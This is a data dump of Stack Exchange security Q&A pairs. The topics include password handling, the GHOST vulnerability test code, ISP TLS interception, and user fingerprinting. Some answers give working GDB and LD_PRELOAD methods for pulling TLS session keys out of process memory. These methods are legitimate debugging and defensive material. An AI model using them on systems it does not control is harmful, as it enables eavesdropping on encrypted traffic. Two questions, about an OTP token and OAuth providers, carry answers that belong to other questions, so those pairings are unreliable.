79,833 | As part of an increase in the security measures for our company, we're moving to making sure all password logins (databases, servers, etc), are done through a password prompt and never using stored passwords. The hope here is that if a company laptop were to go missing, we wouldn't need to change all our passwords. Is this really enough to assume we wouldn't need to change passwords? Is it not possible to recover passwords from memory or disk when they are typed in interactively? | This is a fallacy on several levels. First, you can't expect people to remember passwords that are both strong and unique to each service. It's just not gonna happen. Implementing this is just begging to have "passwords.xlsx" pinned to half the users desktops (the other half will use "passwords.docx"). Second, trying to prevent password change is a move in the completely wrong direction. Instead, you should invest in a strategy that makes it painless to change passwords as often as needed or wanted and help users (including admins) manage these passwords in a safe and efficient way. The reason for that last statement is that if there is one thing certain with passwords, it's that at one point, you will have to change them. An administrator moves on? Change all your system passwords. A manager used the same password for the corporate network as well as his son's football team forum? Change his password. Found a post-it the payroll admin stuck to his screen? Change his password. Use single-sign-on whenever you can, provide a convenient password manager for your users, educate them as much as possible and make it trivially easy to change their passwords. That's the only way to make password usage in an enterprise less risky. | {
"source": [
"https://security.stackexchange.com/questions/79833",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/66844/"
]
} |
80,158 | Consider an application using OpenSSL which has a bug. A packet capture of the full SSL session is available, as well as a core dump and debugging symbols for the application and libraries. A RSA private key is also available, but since a DHE cipher suite is in use, this cannot be used to decrypt the packet capture using Wireshark. Thomas suggests in this post that it is possible to extract keys from RAM. How could this be done for OpenSSL? Assume that the address of the SSL data structure is known and TLS 1.0 is in use. | Note: as of OpenSSL 1.1.1 (unreleased), it will be possible to set a callback function that receives the key log lines. See the SSL_CTX_set_keylog_callback(3) manual for details. This can be injected as usual using a debugger or a LD_PRELOAD hook. Read on if you are stuck with an older OpenSSL version. For a walkthrough of the LD_PRELOAD approach for Apache on Debian Stretch, see my post to Extracting openssl pre-master secret from apache2 . Technical details follow below. If you have just gdb access to the live process or a core dump, you could read data from data structures. It is also possible to use an interposing library. In the following text, the basic idea of key extraction using GDB is described, then an automated script is given to perform the capture. Using GDB (basic idea) Based on this Stackoverflow post , I was able to construct a function that could print a line suitable for Wireshark's key logfile. This is especially useful while analyzing core dumps. In GDB, execute: python
def read_as_hex(name, size):
addr = gdb.parse_and_eval(name).address
data = gdb.selected_inferior().read_memory(addr, size)
return ''.join('%02X' % ord(x) for x in data)
def pm(ssl='s'):
mk = read_as_hex('%s->session->master_key' % ssl, 48)
cr = read_as_hex('%s->s3->client_random' % ssl, 32)
print('CLIENT_RANDOM %s %s' % (cr, mk))
end Then later on, after you step upwards in the stack until you get a SSL structure, invoke the python pm() command. Example: (gdb) bt
#0 0x00007fba7d3623bd in read () at ../sysdeps/unix/syscall-template.S:81
#1 0x00007fba7b40572b in read (__nbytes=5, __buf=0x7fba5006cbc3, __fd=<optimized out>) at /usr/include/x86_64-linux-gnu/bits/unistd.h:44
#2 sock_read (b=0x7fba60191600, out=0x7fba5006cbc3 "\027\003\001\001\220T", outl=5) at bss_sock.c:142
#3 0x00007fba7b40374b in BIO_read (b=0x7fba60191600, out=0x7fba5006cbc3, outl=5) at bio_lib.c:212
#4 0x00007fba7b721a34 in ssl3_read_n (s=0x7fba60010a60, n=5, max=5, extend=<optimized out>) at s3_pkt.c:240
#5 0x00007fba7b722bf5 in ssl3_get_record (s=0x7fba60010a60) at s3_pkt.c:507
#6 ssl3_read_bytes (s=0x7fba60010a60, type=23, buf=0x7fba5c024e00 "Z", len=16384, peek=0) at s3_pkt.c:1011
#7 0x00007fba7b720054 in ssl3_read_internal (s=0x7fba60010a60, buf=0x7fba5c024e00, len=16384, peek=0) at s3_lib.c:4247
...
(gdb) frame
#4 0x00007fba7b721a34 in ssl3_read_n (s=0x7fba60010a60, n=5, max=5, extend=<optimized out>) at s3_pkt.c:240
240 in s3_pkt.c
(gdb) python pm()
CLIENT_RANDOM 9E7EFAC51DBFFF84FCB9...81796EBEA5B15E75FF71EBE 6ED2EA80181... Note : do not forget to install OpenSSL with debugging symbols ! On Debian derivatives it would be named something like libssl1.0.0-dbg , Fedora/RHEL call it openssl-debuginfo , etc. Using GDB (improved, automated approach) The basic idea which is described above works for small, manual tests. For bulk extraction of keys (from a SSL server for example), it would be nicer to automate extraction of these keys. This is done by this Python script for GDB: https://git.lekensteyn.nl/peter/wireshark-notes/tree/src/sslkeylog.py (see its headers for installation and usage instructions). It basically works like this: Install breakpoints on several functions where new pre-master keys can arise. Wait for the function to finish and write these keys (if not known before) to a file (which follows the SSLKEYLOGFILE format from NSS). Paired with Wireshark, you perform a live capture from a remote server by running these commands: # Start logging SSL keys to file premaster.txt. Be careful *not* to
# press Ctrl-C in gdb, these are passed to the application. Use
# kill -TERM $PID_OF_GDB (or -9 instead of -TERM if that did not work).
(server) SSLKEYLOGFILE=premaster.txt gdb -batch -ex skl-batch -p `pidof nginx`
# Read SSL keys from the remote server, flushing after each written line
(local) ssh user@host stdbuf -oL tailf premaster.txt > premaster.txt
# Capture from the remote side and immediately pass the pcap to Wireshark
(local) ssh user@host 'tcpdump -w - -U "tcp port 443"' |
wireshark -k -i - -o ssl.keylog_file:premaster.txt Using LD_PRELOAD SSL/TLS can only negotiate keys at the SSL handshake steps. By interposing the library interfaces of OpenSSL ( libssl.so ) that performs said actions you will be able to read the pre-master key. For clients, you need to interpose SSL_connect . For servers you need to interpose SSL_do_handshake or SSL_accept (depending on the application). To support renegotiation, you will also have to intercept SSL_read and SSL_write . Once these functions are intercepted using a LD_PRELOAD library, you can use dlsym(RTLD_NEXT, "SSL_...") to lookup the "real" symbol from the SSL library. Call this function, extract the keys and pass the return value. An implementation of this functionality is available at https://git.lekensteyn.nl/peter/wireshark-notes/tree/src/sslkeylog.c . Note that different OpenSSL versions (1.0.2, 1.1.0, 1.1.1) are all incompatible with each other. If you have multiple OpenSSL versions installed and need to build an older version, you might have to override the header and library paths: make -B CFLAGS='-I/usr/include/openssl-1.0 -DOPENSSL_SONAME=\"libssl.so.1.0.0\"' | {
"source": [
"https://security.stackexchange.com/questions/80158",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/2630/"
]
} |
80,168 | I found a one-time-password token and am unable to find out who it belongs to or where it has been used. It seems to be manufactured by a company called "ActivIdentity" (now "HID") and called the "keychain"-model. This is what it looks like: It requested a PIN (which I obviously not know), and after I tried several random numbers it locked completely. Looking at the online manual for users of the token, the token must be given to the user's company's IT-administrator to be reinitialized, which I of course don't have. As far as I could find out, one possibility for the administrator would be to initialize it with the "ActivIdentity AAA-Server", which I also don't have. Now I hope to be able to use it for my own systems (e.g. authentication for my ssh-access on my own server). In order to do this, I need to initialize it. Is there any known way to initialize the key with software available to private users? Is there any know possibility to use this for already available online services? | Note: as of OpenSSL 1.1.1 (unreleased), it will be possible to set a callback function that receives the key log lines. See the SSL_CTX_set_keylog_callback(3) manual for details. This can be injected as usual using a debugger or a LD_PRELOAD hook. Read on if you are stuck with an older OpenSSL version. For a walkthrough of the LD_PRELOAD approach for Apache on Debian Stretch, see my post to Extracting openssl pre-master secret from apache2 . Technical details follow below. If you have just gdb access to the live process or a core dump, you could read data from data structures. It is also possible to use an interposing library. In the following text, the basic idea of key extraction using GDB is described, then an automated script is given to perform the capture. Using GDB (basic idea) Based on this Stackoverflow post , I was able to construct a function that could print a line suitable for Wireshark's key logfile. This is especially useful while analyzing core dumps. In GDB, execute: python
def read_as_hex(name, size):
addr = gdb.parse_and_eval(name).address
data = gdb.selected_inferior().read_memory(addr, size)
return ''.join('%02X' % ord(x) for x in data)
def pm(ssl='s'):
mk = read_as_hex('%s->session->master_key' % ssl, 48)
cr = read_as_hex('%s->s3->client_random' % ssl, 32)
print('CLIENT_RANDOM %s %s' % (cr, mk))
end Then later on, after you step upwards in the stack until you get a SSL structure, invoke the python pm() command. Example: (gdb) bt
#0 0x00007fba7d3623bd in read () at ../sysdeps/unix/syscall-template.S:81
#1 0x00007fba7b40572b in read (__nbytes=5, __buf=0x7fba5006cbc3, __fd=<optimized out>) at /usr/include/x86_64-linux-gnu/bits/unistd.h:44
#2 sock_read (b=0x7fba60191600, out=0x7fba5006cbc3 "\027\003\001\001\220T", outl=5) at bss_sock.c:142
#3 0x00007fba7b40374b in BIO_read (b=0x7fba60191600, out=0x7fba5006cbc3, outl=5) at bio_lib.c:212
#4 0x00007fba7b721a34 in ssl3_read_n (s=0x7fba60010a60, n=5, max=5, extend=<optimized out>) at s3_pkt.c:240
#5 0x00007fba7b722bf5 in ssl3_get_record (s=0x7fba60010a60) at s3_pkt.c:507
#6 ssl3_read_bytes (s=0x7fba60010a60, type=23, buf=0x7fba5c024e00 "Z", len=16384, peek=0) at s3_pkt.c:1011
#7 0x00007fba7b720054 in ssl3_read_internal (s=0x7fba60010a60, buf=0x7fba5c024e00, len=16384, peek=0) at s3_lib.c:4247
...
(gdb) frame
#4 0x00007fba7b721a34 in ssl3_read_n (s=0x7fba60010a60, n=5, max=5, extend=<optimized out>) at s3_pkt.c:240
240 in s3_pkt.c
(gdb) python pm()
CLIENT_RANDOM 9E7EFAC51DBFFF84FCB9...81796EBEA5B15E75FF71EBE 6ED2EA80181... Note : do not forget to install OpenSSL with debugging symbols ! On Debian derivatives it would be named something like libssl1.0.0-dbg , Fedora/RHEL call it openssl-debuginfo , etc. Using GDB (improved, automated approach) The basic idea which is described above works for small, manual tests. For bulk extraction of keys (from a SSL server for example), it would be nicer to automate extraction of these keys. This is done by this Python script for GDB: https://git.lekensteyn.nl/peter/wireshark-notes/tree/src/sslkeylog.py (see its headers for installation and usage instructions). It basically works like this: Install breakpoints on several functions where new pre-master keys can arise. Wait for the function to finish and write these keys (if not known before) to a file (which follows the SSLKEYLOGFILE format from NSS). Paired with Wireshark, you perform a live capture from a remote server by running these commands: # Start logging SSL keys to file premaster.txt. Be careful *not* to
# press Ctrl-C in gdb, these are passed to the application. Use
# kill -TERM $PID_OF_GDB (or -9 instead of -TERM if that did not work).
(server) SSLKEYLOGFILE=premaster.txt gdb -batch -ex skl-batch -p `pidof nginx`
# Read SSL keys from the remote server, flushing after each written line
(local) ssh user@host stdbuf -oL tailf premaster.txt > premaster.txt
# Capture from the remote side and immediately pass the pcap to Wireshark
(local) ssh user@host 'tcpdump -w - -U "tcp port 443"' |
wireshark -k -i - -o ssl.keylog_file:premaster.txt Using LD_PRELOAD SSL/TLS can only negotiate keys at the SSL handshake steps. By interposing the library interfaces of OpenSSL ( libssl.so ) that performs said actions you will be able to read the pre-master key. For clients, you need to interpose SSL_connect . For servers you need to interpose SSL_do_handshake or SSL_accept (depending on the application). To support renegotiation, you will also have to intercept SSL_read and SSL_write . Once these functions are intercepted using a LD_PRELOAD library, you can use dlsym(RTLD_NEXT, "SSL_...") to lookup the "real" symbol from the SSL library. Call this function, extract the keys and pass the return value. An implementation of this functionality is available at https://git.lekensteyn.nl/peter/wireshark-notes/tree/src/sslkeylog.c . Note that different OpenSSL versions (1.0.2, 1.1.0, 1.1.1) are all incompatible with each other. If you have multiple OpenSSL versions installed and need to build an older version, you might have to override the header and library paths: make -B CFLAGS='-I/usr/include/openssl-1.0 -DOPENSSL_SONAME=\"libssl.so.1.0.0\"' | {
"source": [
"https://security.stackexchange.com/questions/80168",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/67122/"
]
} |
80,170 | I have TLS connection between my server and client. I have no certificate, so the connection is susceptible to the Man-in-the-middle attack. I fear that attacker could intercept the password hash and use it to authenticate himself in my application. What is the best way to transmit password hash? To use server nonce or client nonce? And what hashing algorithm should I use? | You should look into Certificate pinning . This is effectively allowing you to trust your self-signed certificate, and that server certificate only from your client by a hard lookup of the public key of the certificate. So the chain of authority is not followed (which is where a self-signed certificate falls down) and instead the public key is validated by the client application to be trusted directly. You should not look at hashing, or anything else on the application layer as it will be inherently susceptible to a MITM attack. | {
"source": [
"https://security.stackexchange.com/questions/80170",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/67126/"
]
} |
80,190 | This question is somewhat acedemic in nature. While educating myself about the topic of Security via a Bearer Tokens for a back-end service that I am working on, and specifically about oAuth2, a few questions came up in my mind: If you were to outsource the identity provider / authorization service, you create a dependency on that service provider. How much of a pain would it be to move to a new oAuth2 service provider? What if the service provider "fails" (disappears from the internet or have their systems compromised or changes their policies in a way that is incompatible with your requirements, etc) As a way of reducing dependency it occurred to me that I might be able to configure the resource server to check every request to have two tokens, from two different service providers, eg SP-A and SP-B. To do that your [client's] users would have to "be registered" at both SP-A and SP-B. That would imply that during the sign-up process, users details would be submitted to and records created at both SP-A and SP-B. Client developers will be impacted in that they need to develop their applications to register users with two oAuth providers, and must obtain Authorization codes from two providers. For end users the impact may be minimized, but if a client wanted to use users' existing OpenID IdPs to effect initial registration and sign-in authentication, the user would have to authorize TWO access to their data. The one immediate benefit would be that you could then set a global flag in the back-end for each of SP-A and SP-B, to ignore/bypass that provider, should you need. You could also use different policies, eg require a valid token from all oAuth providers, or from at least one oAuth provider, etc, depending on your requirements. Of course one would always still have to check an Authorization Providers' credentials, track record, etc and try to evaluate the risks. | You should look into Certificate pinning . This is effectively allowing you to trust your self-signed certificate, and that server certificate only from your client by a hard lookup of the public key of the certificate. So the chain of authority is not followed (which is where a self-signed certificate falls down) and instead the public key is validated by the client application to be trusted directly. You should not look at hashing, or anything else on the application layer as it will be inherently susceptible to a MITM attack. | {
"source": [
"https://security.stackexchange.com/questions/80190",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/66581/"
]
} |
80,210 | GHOST ( CVE-2015-0235 ) just popped up. How can I quickly check if a system of mine is secure? Ideally with a one line shell command. According to the ZDNet article "you should then reboot the system". Ideally the test would also indicate this... | It appears you can download a tool from the University of Chicago that will let you test your system for the vulnerability. This does not repair or restart anything it will only tell you if your system is vulnerable. $ wget https://webshare.uchicago.edu/orgs/ITServices/itsec/Downloads/GHOST.c
$ gcc GHOST.c -o GHOST
$ ./GHOST
[responds vulnerable OR not vulnerable ] Running this on one of my remote servers I get: user@host:~# wget https://webshare.uchicago.edu/orgs/ITServices/itsec/Downloads/GHOST.c
--2015-01-27 22:30:46-- https://webshare.uchicago.edu/orgs/ITServices/itsec/Downloads/GHOST.c
Resolving webshare.uchicago.edu (webshare.uchicago.edu)... 128.135.22.61
Connecting to webshare.uchicago.edu (webshare.uchicago.edu)|128.135.22.61|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1046 (1.0K) [text/x-csrc]
Saving to: `GHOST.c'
100%[============================================>] 1,046 --.-K/s in 0s
2015-01-27 22:30:48 (237 MB/s) - `GHOST.c' saved [1046/1046]
user@host:~# gcc GHOST.c -o GHOST
user@host:~# ./GHOST
vulnerable The source code of that script looks like this next code block but you should inspect the origin code first anyway . As others have pointed out, if you are arbitrarily running code off the internet without knowing what it does then bad things may happen : /*
* GHOST vulnerability check
* http://www.openwall.com/lists/oss-security/2015/01/27/9
* Usage: gcc GHOST.c -o GHOST && ./GHOST
*/
#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#define CANARY "in_the_coal_mine"
struct {
char buffer[1024];
char canary[sizeof(CANARY)];
} temp = { "buffer", CANARY };
int main(void) {
struct hostent resbuf;
struct hostent *result;
int herrno;
int retval;
/*** strlen (name) = size_needed - sizeof (*host_addr) - sizeof (*h_addr_ptrs) - 1; ***/
size_t len = sizeof(temp.buffer) - 16*sizeof(unsigned char) - 2*sizeof(char *) - 1;
char name[sizeof(temp.buffer)];
memset(name, '0', len);
name[len] = '\0';
retval = gethostbyname_r(name, &resbuf, temp.buffer, sizeof(temp.buffer), &result, &herrno);
if (strcmp(temp.canary, CANARY) != 0) {
puts("vulnerable");
exit(EXIT_SUCCESS);
}
if (retval == ERANGE) {
puts("not vulnerable");
exit(EXIT_SUCCESS);
}
puts("should not happen");
exit(EXIT_FAILURE);
} Edit :
I've added an ansible playbook here if it's of use to anyone, if you have a large number of systems to test then ansible will allow you to do it quickly. Also, as per discussion below, if you find your servers are vulnerable and apply available patches, it is highly recommended that you reboot your system . | {
"source": [
"https://security.stackexchange.com/questions/80210",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/36782/"
]
} |
80,333 | I was reading a paper and saw this piece of code has an information leakage vulnerability. It was saying the following code will Leak memory layout information to the attackers Could somebody please explain me how this leaks information? struct userInfo{
char username[16];
void* (*printName)(char*);
} user;
...
user.printName = publicFunction.
...
n = attacker_controllable_value; //20
memcpy(buf, user.username, n); //get function ptr
SendToServer(buf); I can see memcpy will give exception but why should it return memory address to attacker(or whatever it is returning)? Thanks in advance | Assuming buf 's size is either controlled by n or larger than 16, the attacker could make n any number he wanted and use that to read an arbitrary amount of memory. memcpy and C in general do not throw exceptions or prevent this from happening. So long as you don't violate any sort of page protections or hit an invalid address, memcpy would continue merrily along until it copies the amount of memory requested. I assume that user and this vulnerable block of code is in a function somewhere. This likely means it resides on the stack. All local function variables, the return address, and other information are contained on the stack. The below diagram shows it's structure in systems using intel assembly (which most platforms use and I assume your computer does). You would be able to get the return address using this method if you were to make n large enough to cause memcpy to move forward in the stack frame. user would be in the section in this diagram labeled "Locally declared variables". EBP is a 4 byte value, so if we were to read past that and them copy the next 4 bytes with memcpy, we'd end up copying the return address. Note the the above depends on what architecture the program is running on. This paper is about iOS, and since I don't know anything about ARM, the specifics of this information could be somewhat inaccurate. | {
"source": [
"https://security.stackexchange.com/questions/80333",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/19694/"
]
} |
80,340 | How can I protect php execution in specific upload directory? Mostly, people put .htaccess in upload folder to protect php execution. But someone says it can be replaced by attackers. So how can I control it from the root .htaccess ? I tried to put the below codes in root .htaccess but it shows "500 internal sever error" and my website goes down. <Directory ^public_html/product/uploads>
<Files ^(*.php|*.phps)>
order deny,allow
deny from all
</Files>
</Directory> Thanks in advance | Assuming buf 's size is either controlled by n or larger than 16, the attacker could make n any number he wanted and use that to read an arbitrary amount of memory. memcpy and C in general do not throw exceptions or prevent this from happening. So long as you don't violate any sort of page protections or hit an invalid address, memcpy would continue merrily along until it copies the amount of memory requested. I assume that user and this vulnerable block of code is in a function somewhere. This likely means it resides on the stack. All local function variables, the return address, and other information are contained on the stack. The below diagram shows it's structure in systems using intel assembly (which most platforms use and I assume your computer does). You would be able to get the return address using this method if you were to make n large enough to cause memcpy to move forward in the stack frame. user would be in the section in this diagram labeled "Locally declared variables". EBP is a 4 byte value, so if we were to read past that and them copy the next 4 bytes with memcpy, we'd end up copying the return address. Note the the above depends on what architecture the program is running on. This paper is about iOS, and since I don't know anything about ARM, the specifics of this information could be somewhat inaccurate. | {
"source": [
"https://security.stackexchange.com/questions/80340",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/26034/"
]
} |
80,360 | A website (www.blue*****art.com) is trying to attack my server using the Shellshock vulnerability . After doing an Nmap scan on the attacking IP address, I found many open ports. It looks like the website is running Exim , which is vulnerable to GHOST . The website in question has not been maintained for the past three years (from copyright date, Twitter and Facebook status); possibly the owner passed away. A check with Sucuri shows that it is currently not blacklisted, because no malware has been found. Should I retaliate by taking over the website from the hacker and shutting it down to stop it from scanning other people's computers? | Not if you want to stay out of trouble. What you are suggesting is vigilante action, and most legal systems do not look kindly upon that. Even though you may feel you are protecting other, less tech-savvy people, it would probably still constitute a crime. What you could do, is try and find out if there are authorities to warn. This could be the hosting provider, the registrar, or the police of the country where the website is hosted. Or, if you believe the site has been hijacked, find either the owner or their remaining relatives. | {
"source": [
"https://security.stackexchange.com/questions/80360",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/67281/"
]
} |
80,488 | It seems to me that because Users can post questions and comments in them with HTML markup (possibly <script> tags), Stack Exchange sites would be very exposed to XSS attacks. How do they protect from this? | For general comments, the script tags are properly escaped , so that it's just interpreted as text instead of as actual code. In this case, that sort of thing is handled via something known as HTML encoding, where your <script> tag would get turned into <script> and rendered as a text string instead of interpreted as code. That said, StackOverflow has worked on a new feature that allows executable javascript in peoples' answers: http://blog.stackoverflow.com/2014/09/introducing-runnable-javascript-css-and-html-code-snippets/ Some of the security points from the article I want to highlight: Are Stack Snippets Safe? Yes, as much as the web in general is safe. You are not in any more danger than you are when browsing any
site with JavaScript enabled. With that said, the snippets are running
client code in your browser, and you should always exercise caution
when running code contributed by another user. We isolate snippets
from our sites to block access to your private Stack Exchange data: •We use HTML5 sandboxed iframes in order to prevent many forms of
malicious attack. •We render the Snippets on an external domain
(stacksnippets.net) in order to ensure that the same-origin policy is
not in effect and to keep the snippets from accessing your logged-in
session or cookies. Like all other aspects of our site, Stack
Snippets are ultimately governed by the community. Because users can
still write code that creates annoying behaviors like infinite loops
or pop-ups, we disable snippets on any post that is heavily downvoted
(scoring less than -3 on Stack Overflow, -8 on Meta). If you see bad
code that you think should be disabled, downvote the post. If you see
code that is intended to be harmful (such as an attempt at phishing),
you should flag it for moderator attention. | {
"source": [
"https://security.stackexchange.com/questions/80488",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/67322/"
]
} |
80,662 | I found myself suddenly unable to access websites that use HTTPS, so I contacted my service provider, and they asked me to install a certificate in the Trusted Root Certificate Authorities store. But something isn't right: installing a certificate on every device connected to the same network just to be able to access websites that use HTTPS is just weird! How can I be sure that this certificate is issued by a trusted CA? When I tried to install it, I got the following message: Warning: If you install this root certificate, Windows will automatically trust any certificate issued by this CA. Installing a certificate with an unconfirmed thumbprint is a security risk. If you click "Yes" you acknowledge this risk. Here is the certificate information: Version: V3 Serial num: 00 f8 ab 36 f3 84 31 05 39 Signature algo: sha1RSA Signature hash algo: sha1 Issuer: ISSA, Internet, Internet, Beirut, Beirut, LB Subject: ISSA, Internet, Internet, Beirut, Beirut, LB Public Key: RSA (1024 bits) It's valid until 2019. And by the way, I'm in Lebanon. I contacted my ISP again and they told me that they're using some kind of an accelerator to enhance the speed, and it needs authentication, so they chose to use a certificate instead of making the user enter a username and password every time they wants to access websites that use HTTPS. And they suggested that if I'm not okay with that, they would put me in a new pool. So what should I do? | Whilst I don't know the specifics of your ISP, I would say that it's likely that what they're doing here is intercepting all traffic you send over the Internet. In order to do that (without you getting error messages whenever you visit an HTTPS encrypted site), they would need to install a root certificate, which is what you mention in your post. They need to do this as what this kind of interception usually entails is creating their own certificate for each site you visit. so for example if you visit https://www.amazon.com they need to have a certificate that your browser considers valid for that connection (which is one issued by a trusted Certificate Authority, either one provided with the browser or one you manually install). From your perspective, the problem here is it means that they can see all your Internet traffic including usernames/passwords/credit card details. So if they want to, they can look at that information. Also if they have a security breach it's possible that other people might get access to that information. In addition, they may also gain access to any account that you access over this Internet connection (e.g., email accounts). Finally, installing this root certificate allows them to modify your Internet traffic without detection. What I would recommend is that you query with them exactly why they need to see the details of your encrypted traffic (e.g., is this a legal requirement for your country) and if you're not 100% satisfied with the response, get a new ISP. Another possibility is to use a VPN and tunnel all your traffic through the VPN. If you are not happy with your ISP gaining this access to your HTTPS connections, do not install the root certificate they provided you. | {
"source": [
"https://security.stackexchange.com/questions/80662",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/67541/"
]
} |
80,727 | When my users are authenticated they receive an authentication token, I need to use this authentication token to authorize some asp.net WebAPI calls. To do this I need to add the token to the head of that call, so I need the token accessible from the users browser. I think that storing the token in a cookie isn't the safest way, so what is the safest way to store that token and still accessible in my javascript to make API call's? | There are two ways you can save authentication information in the browser: Cookies HTML5 Web Storage In each case, you have to trust that browsers are implemented correctly, and that Website A can't somehow access the authentication information for Website B. In that sense, both storage mechanisms are equally secure. Problems can arise in terms of how you use them though. If you use cookies: The browser will automatically send the authentication information with every request to the API. This can be convenient so long as you know it's happening. You have to remember that CSRF is a thing, and deal with it. If you use HTML5 Web Storage: You have to write Javascript that manages exactly what authentication information is sent to the API. A big practical difference people care about is that with cookies, you have to worry about CSRF. To handle CSRF properly, you need an additional "synchronizer token". All-in-one web frameworks (like Grails, Rails, probably asp.net) usually provide an easy way to enable CSRF protection, and automatically add synchronizer token stuff in your UI. But if you're writing a UI using a client-side-only web framework (like AngularJS or BackboneJS), you're going to have to write some Javascript to manage the synchronizer token. So in that case you might as well just go with the HTML5 Web Storage approach and only worry about one token. | {
"source": [
"https://security.stackexchange.com/questions/80727",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/67600/"
]
} |
80,904 | Today I had a hard time explaining the difference to a friend. I know seeds are used when generating "random" strings. And salts are used when providing different outcomes to a hash. What is a better way of describing these concepts and their possible differences. | Seed: Encryption is powered by random numbers, but how do you generate a truly random number? The current millisecond? The number of processor threads in use? You need a starting point. This is called a seed: it kicks off a random number. Salt: When you hash a string, it will always end up with the same hash. foo = acbd18db4cc2f85cedef654fccc4a4d8 every time. This is a problem when you want to store things that you want to keep truly hidden (like passwords). If you see acbd18db4cc2f85cedef654fccc4a4d8 you always know that it is foo . So, you simply add a "salt" to the original string to make sure that it is unique. foo + asdf = e967c9fead712d976ed6fb3d3544ee6a foo + zxcv = a6fa8477827b2d1a4c4824e66703daa9 So 'salt' makes a 'hash' better by obscuring the original text. | {
"source": [
"https://security.stackexchange.com/questions/80904",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/6402/"
]
} |
80,991 | While perusing the contents of pcap files I've noticed some URLs appear to be visible despite being HTTPS. These mainly occur inside payloads that contain cert URLs too, but I also see HTTPS URLs inside what appear to be HTTP payloads. Can someone say conclusively whether HTTPS URLs are truly kept secret? I'm concerned about this because I want to put some parameters in the URL and I don't want these to be easily uncovered. | With HTTPS the path and query string of the URL is encrypted, while the hostname is visible inside the SSL handshake as plain text if the client uses Server Name Indication (SNI). All modern clients use SNI because this is the only way to have different hosts with their own certificates behind the same IP address. The rest of the URL (i.e. everything but the hostname) will only be used inside the encrypted connection. Thus in theory it is hidden from the attacker unless the encryption itself gets broken (compromising the private key, man-in-the-middle attacks etc). In practice an attacker might have indirect ways to get information about the remaining part of the URL: Different pages on the same server serve different content with different sizes etc. If the attacker scans the site to find out all possible pages he might then be able to find out which pages you've accessed just by looking at the size of the transferred data. Links to other sites contain Referer header. Usually the Referer is stripped when linking from https to http, but if the attacker controls one of the sites linked with https he might be able to find out where the link came from, that is the site you've accessed. But in most cases you are pretty safe with HTTPS, at least much safer than with plain HTTP. | {
"source": [
"https://security.stackexchange.com/questions/80991",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/67642/"
]
} |
81,228 | In his answer to " How does SSL/TLS work? ", Luc gives an explanation of how SSL works: SSL (and its successor, TLS) is a protocol that operates directly on top of TCP (although there are also implementations for datagram based protocols such as UDP). This way, protocols on higher layers (such as HTTP) can be left unchanged while still providing a secure connection. Underneath the SSL layer, HTTP is identical to HTTPS. In his first sentence, he is saying that protocols on higher layers can be left unchanged. What does he mean? I know the OSI layers, but I think I've got some knowledge issues here. | You should think of OSI layers as packaging. Let's say I want to ship a glass to you. I chose an original package for advertisement purposes, showing how nice is my product and what you can buy to add to your "glass" experience. That's the high layer of my protocol. Then I put this package in a box filled with soft thingies because I don't want it to be broken by transportation. This is a second layer. Then my shipment department enclose this box into a bigger package, with a label to be shipped to your home. Again, another layer. Then the transporter put this box in a truck with many other boxes and instruct the driver to go to another delivery center, again another layer. For what we know, the truck driver does not need to know : where do the boxes go exactly in your home, he just needs to know your address what protection are in the boxes, he just has to drive as safely as it's instructed in his contract what exactly is in the boxes Let's say now that I want to provide confidentiality to my shipment. Because, a curious driver could try to tamper with the packages to know what's inside, or steal it and resell it. I can use a protocol where your packaged-soft-coated glass is also put into a metal box with a locker. It will protect it from tampering by the truck driver, as he won't be able to peek inside, or take the merchandise. It does not protect the lower layers, he could still dump all the fret into a lake, this is denial of service. Moreover, my locker does not care what's inside it. It could be your glass, it could be flowers or it could be empty. But it still serves the purpose of avoiding anyone other than you (and the shipper ofc) to know what is inside. It goes the same for the protocols in the OSI. Lower layers does not care about what is happening in the upper layers. This is left for another agent to decode/handle it. Edit for clarification: when we say "left unchanged" it does not mean the information is not processed. For SSL in particular, the payload of the SSL layer is an encryption of the packet of the higher layer. But when SSL operated in the other side, it will decrypt the original packet with no modification. | {
"source": [
"https://security.stackexchange.com/questions/81228",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/67987/"
]
} |
81,302 | I have created a login module on my website. I was able to deal with simple brute force attacks since I can identify the user based on username/email and throttle their login based on failed login attempts per user account. But when it comes to user-enumerated brute-force attacks (a.k.a. Reverse brute force attacks), identifying the user becomes pretty hard. Throttling the login based on failed attempts per IP address might not work well and annoy the users connected to the Internet through a local network since they'll have same external IP address, as they might face throttle due to failed attempts made by someone else on the network. Is there a way to uniquely identify such users? | How to uniquely identify users with the same external IP address?
Is there any way to uniquely identify such users? Yes, there are lots of ways: Cookies Evercookies (JavaScript code that uses lots of different techniques to store identifying information, among them flash cookies, the various HTML5 storage options, the browsers visited links history, etc) Device fingerprinting: use the HTTP header (mainly User Agent, but the other headers and their order can help as well) Device fingerprinting with JavaScript: with JavaScript, you can get a lot of information, such as screen resolution, timezone, plugins, system fonts, etc. Behavior: how fast do the users fill in forms, where on a button do they click, etc. But most of these are not useful in defending against brute-force attacks, since the program doing them will probably not accept cookies or run JavaScript. In your case, you might try: HTTP header: these might actually already be enough to differentiate between users using the same IP address (of course, an attacker can just randomly switch them, but I would assume most currently don't). Light throttling: you don't have to block IP addresses, you could just slow down the login process for them. That way, brute forcing becomes a lot less feasible, but real users using the same IP address can still login. CAPTCHAs : these will annoy legitimate users, but hopefully not too many users actually use an IP address from which brute-force attacks originate (of course, there are tools to automatically solve CAPTCHAs, but it's still harder than no CAPTCHA). You could require a user to accept cookies, and to send various identifying information before being allowed to login (such as the screen resolution, timezone, etc.). Of course, an attacker can do this as well, but I don't think any currently existing bruteforce tools can do this, so they would have to write a custom script. But this might also annoy legitimate users. | {
"source": [
"https://security.stackexchange.com/questions/81302",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/54346/"
]
} |
